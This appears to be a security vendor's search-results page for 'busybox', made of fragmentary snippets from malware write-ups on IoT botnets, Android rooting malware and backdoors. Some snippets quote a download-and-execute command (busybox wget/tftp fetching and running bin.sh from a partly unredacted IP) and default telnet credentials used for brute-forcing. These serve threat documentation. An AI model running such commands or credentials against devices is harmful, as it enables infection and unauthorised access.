Keyword: busybox
commands to download and execute a file in the remote computer: cd /tmp; busybox wget http://{BLOCKED}9.{BLOCKED}3.37.115/.{BLOCKED}ggers/bin.sh; busybox tftp -r bin.sh -g {BLOCKED}9.{BLOCKED}3.37.115;sh
pass password support toor 123456 If it was able to successfully log into the system, it sends the following commands to download and execute a file in the remote computer: cd /tmp; busybox wget http://
file in the remote computer: cd /tmp; busybox wget http://{BLOCKED}9.{BLOCKED}3.37.115/.{BLOCKED}ggers/bin.sh; busybox tftp -r bin.sh -g 69.163.37.115;sh bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' cd
It exploits an Android vulnerability (CVE-2012-6422) to gain root privilege. It then proceeds to install busybox and su to /system/xbin/. Figure 1. Installing busybox Figure 2. Installing su
{BLOCKED}.143.98:259 Other Details This Backdoor does the following: It uses the following credentials to try to log in to busybox telnet and used security/misconfiguration/default password: telecomadmin
reboot To unroot, it first extracts busybox to $x, and then runs the following commands: $x/busybox mount -o remount,rw /system $x/busybox rm /system/bin/su $x/busybox rm /system/xbin/su $x/busybox rm
Backdoor Routine This Backdoor executes the following commands from a remote malicious user: Clean device by doing the following: It terminates processes that contain the following strings: busybox python
telarmv5 telarmv4tl telarmv4 telarmv6 teli686 telpowerpc telpowerpc440fp teli586 telm68k telsparc telx86_64 TwoFace* xxb* bb busybotnet busybox badbox B1 B2 B3 B4 B5 B6 B7 B8 B9 B10 B11 B12 B13 B14 B15 B16
\checkupdate.exe %Program Files%\Kingo ROOT\feedback.exe %Program Files%\Kingo ROOT\files %Program Files%\Kingo ROOT\files\busybox %Program Files%\Kingo ROOT\files\checksum %Program Files%\Kingo ROOT\files
}.tmp %Program Files%\Kingo ROOT\Components\qmldir %Program Files%\Kingo ROOT\feedback.exe %Program Files%\Kingo ROOT\files\busybox %Program Files%\Kingo ROOT\files\checksum %Program Files%\Kingo ROOT
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It takes advantage of software vulnerabilities to
This malware is involved in the Bash Vulnerability Exploit attack of September 2014. It is capable of compromising an affected system's security by carrying out commands made by a malicious remote
%AppDataLocal%\Mobogenie\Version\NewVersion\Mobogenie\busybox %AppDataLocal%\Mobogenie\Version\NewVersion\Mobogenie\configure.mu %AppDataLocal%\Mobogenie\Version\NewVersion\Mobogenie\DaemonProcess.exe
This Backdoor listens on port(s). It connects to a website to send and receive information. Arrival Details This Backdoor may be downloaded from the following remote site(s): {BLOCKED}.{BLOCKED